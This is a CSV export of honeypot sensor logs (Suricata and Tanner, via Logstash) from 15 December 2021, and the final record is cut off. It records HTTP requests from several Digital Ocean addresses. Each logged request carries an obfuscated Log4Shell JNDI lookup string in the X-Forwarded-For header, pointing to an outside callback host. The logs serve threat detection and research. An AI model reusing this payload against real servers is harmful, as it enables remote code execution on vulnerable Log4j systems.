"2021-12-15T11:09:44.478Z",1,"ryTIvX0B5e7x5EYnsre-","logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.89.158.150",39228,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text, with very long lines (1488)",51cdc5a4827fd0f112758593f673c970,"[]",10424,CLOSED,false,1,,,,,,,1241047123851125,"Digital Ocean, Inc.",14061,Bengaluru,AS,IN,IN,India,,"172.16.0.42","12.9771","{""lon"":77.5871,""lat"":12.9771}","77.5871",560100,KA,Karnataka,"Asia/Kolkata",,,,,,,,,,,,,,,d732b3b75613,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48364507,,"{""timestamp"":""2021-12-15T11:09:44.478078+0000"",""flow_id"":1241047123851125,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.89.158.150"",""dest_port"":39228,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10424},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1488)"",""gaps"":false,""state"":""CLOSED"",""md5"":""51cdc5a4827fd0f112758593f673c970"",""stored"":false,""size"":10424,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:44.478078+0000",,,,,,,,,Suricata,,,,
"2021-12-15T11:09:44.218Z",1,"f4fIvX0B6VkG8jKzwoJ-","logstash-tanner-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"cf0f5fcf-cad2-4081-978c-6552d4433ed2",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"159.89.158.150","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=cf0f5fcf-cad2-4081-978c-6552d4433ed2",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d732b3b75613,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",66293,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=cf0f5fcf-cad2-4081-978c-6552d4433ed2""}, ""uuid"": ""b868d0fa-3d8d-4273-bed1-6395dbfd3241"", ""peer"": {""ip"": ""159.89.158.150"", ""port"": 39228}, ""status"": 200, ""cookies"": {""sess_uuid"": ""cf0f5fcf-cad2-4081-978c-6552d4433ed2""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""2a803d70-ed05-436b-8096-e0bc0591c208""}}}, ""timestamp"": ""2021-12-15T11:09:44.218118""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","2a803d70-ed05-436b-8096-e0bc0591c208","0.6.0",,,,,,,,,,,,,,,,,,"159.89.158.150",39228,,,,,,,,,200,,,easternfingernail,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:44.218118",,,,,,,,,Tanner,,,"b868d0fa-3d8d-4273-bed1-6395dbfd3241",
"2021-12-15T11:09:44.186Z",1,x7nIvX0BCXMCNTQLrhOZ,"logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1241047123851125,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"159.89.158.150","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,d732b3b75613,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48362380,,"{""timestamp"":""2021-12-15T11:09:44.186033+0000"",""flow_id"":1241047123851125,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.89.158.150"",""src_port"":39228,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.89.158.150",39228,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:44.186033+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T11:09:44.186Z",1,yLnIvX0BCXMCNTQLrhOZ,"logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.89.158.150",39228,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (1673)",c9c65774fd2401c660a14616a73a1890,"[]",13383,CLOSED,false,0,,,,,,,1241047123851125,"Digital Ocean, Inc.",14061,Bengaluru,AS,IN,IN,India,,"172.16.0.42","12.9771","{""lon"":77.5871,""lat"":12.9771}","77.5871",560100,KA,Karnataka,"Asia/Kolkata",,,,,,,,,,,,,,,d732b3b75613,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",13383,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48363022,,"{""timestamp"":""2021-12-15T11:09:44.186033+0000"",""flow_id"":1241047123851125,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.89.158.150"",""dest_port"":39228,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (1673)"",""gaps"":false,""state"":""CLOSED"",""md5"":""c9c65774fd2401c660a14616a73a1890"",""stored"":false,""size"":13383,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:44.186033+0000",,,,,,,,,Suricata,,,,
"2021-12-15T11:09:43.676Z",1,"fofIvX0B6VkG8jKzwoJ-","logstash-tanner-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"159.89.158.150","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d732b3b75613,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",65514,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""b868d0fa-3d8d-4273-bed1-6395dbfd3241"", ""peer"": {""ip"": ""159.89.158.150"", ""port"": 39228}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""cf0f5fcf-cad2-4081-978c-6552d4433ed2""}}}, ""timestamp"": ""2021-12-15T11:09:43.676962""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","cf0f5fcf-cad2-4081-978c-6552d4433ed2","0.6.0",,,,,,,,,,,,,,,,,,"159.89.158.150",39228,,,,,,,,,200,,,easternfingernail,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T11:09:43.676962",,,,,,,,,Tanner,,,"b868d0fa-3d8d-4273-bed1-6395dbfd3241",
"2021-12-15T10:56:29.614Z",1,"7CS8vX0B5e7x5EYnizu_","logstash-suricata-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,808092893446637,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,d5c06704a974,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",50195,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",20297548,,"{""timestamp"":""2021-12-15T10:56:29.614603+0000"",""flow_id"":808092893446637,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.167.229"",""src_port"":55306,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":50195}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.167.229",55306,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:56:29.614603+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T10:56:29.614Z",1,"7SS8vX0B5e7x5EYnizu_","logstash-suricata-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.167.229",55306,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, Unicode text, UTF-8 text, with very long lines (370)",61aeec46a50c9ea8268014d2e7f0c0ef,"[]",50195,CLOSED,false,1,,,,,,,808092893446637,,,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c06704a974,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",50195,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",20298199,,"{""timestamp"":""2021-12-15T10:56:29.614603+0000"",""flow_id"":808092893446637,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.167.229"",""dest_port"":55306,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":50195},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (370)"",""gaps"":false,""state"":""CLOSED"",""md5"":""61aeec46a50c9ea8268014d2e7f0c0ef"",""stored"":false,""size"":50195,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:56:29.614603+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:56:29.342Z",1,GyS8vX0B5e7x5EYnkDyR,"logstash-tanner-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"cf4f7032-0629-44ac-925d-64c842df1780",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=cf4f7032-0629-44ac-925d-64c842df1780",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d5c06704a974,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",95086,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=cf4f7032-0629-44ac-925d-64c842df1780""}, ""uuid"": ""3252b19e-4a60-49f4-9a28-71d62407bac2"", ""peer"": {""ip"": ""138.197.167.229"", ""port"": 55306}, ""status"": 200, ""cookies"": {""sess_uuid"": ""cf4f7032-0629-44ac-925d-64c842df1780""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""4efde24f-b26d-4f18-a305-65fa20c9832b""}}}, ""timestamp"": ""2021-12-15T10:56:29.342657""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","4efde24f-b26d-4f18-a305-65fa20c9832b","0.6.0",,,,,,,,,,,,,,,,,,"138.197.167.229",55306,,,,,,,,,200,,,doubletomato,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:56:29.342657",,,,,,,,,Tanner,,,"3252b19e-4a60-49f4-9a28-71d62407bac2",
"2021-12-15T10:56:28.620Z",1,yIe8vX0B6VkG8jKzhwWs,"logstash-suricata-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,808092893446637,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,d5c06704a974,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",52671,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",20288730,,"{""timestamp"":""2021-12-15T10:56:28.620410+0000"",""flow_id"":808092893446637,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.167.229"",""src_port"":55306,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":52671}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.167.229",55306,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:56:28.620410+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T10:56:28.620Z",1,yYe8vX0B6VkG8jKzhwWs,"logstash-suricata-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.167.229",55306,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (2102)",bb01c1060ecc1bf4eb4f6a2291787714,"[]",52671,CLOSED,false,0,,,,,,,808092893446637,,,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c06704a974,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",52671,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",20289370,,"{""timestamp"":""2021-12-15T10:56:28.620410+0000"",""flow_id"":808092893446637,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.167.229"",""dest_port"":55306,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":52671},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (2102)"",""gaps"":false,""state"":""CLOSED"",""md5"":""bb01c1060ecc1bf4eb4f6a2291787714"",""stored"":false,""size"":52671,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T10:56:28.620410+0000",,,,,,,,,Suricata,,,,
"2021-12-15T10:56:28.247Z",1,GiS8vX0B5e7x5EYnkDyR,"logstash-tanner-2021.12.15",,"_doc","1c82e366-a501-4faa-89c5-9a930a2da558",d5c06704a974,"35064c15-2483-41fb-a866-d82f542f7c36",d5c06704a974,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",d5c06704a974,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",94307,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""3252b19e-4a60-49f4-9a28-71d62407bac2"", ""peer"": {""ip"": ""138.197.167.229"", ""port"": 55306}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""cf4f7032-0629-44ac-925d-64c842df1780""}}}, ""timestamp"": ""2021-12-15T10:56:28.247874""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","cf4f7032-0629-44ac-925d-64c842df1780","0.6.0",,,,,,,,,,,,,,,,,,"138.197.167.229",55306,,,,,,,,,200,,,doubletomato,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T10:56:28.247874",,,,,,,,,Tanner,,,"3252b19e-4a60-49f4-9a28-71d62407bac2",
"2021-12-15T10:40:35.486Z",1,xLiuvX0BCXMCNTQLECwH,"logstash-suricata-2021.12.15",,"_doc","b148a344-a735-455a-962f-049832e5aea5",d732b3b75613,"4ed4dd0a-7d6e-4feb-a94f-8ef7008a16e9",d732b3b75613,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1562396462322105,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,d732b3b75613,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",10424,"HTTP/1.1",200,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",47462428,,"{""timestamp"":""2021-12-15T10:40:35.486647+0000"",""flow_id"":1562396462322105,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.97.119"",""src_port"":51588,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, 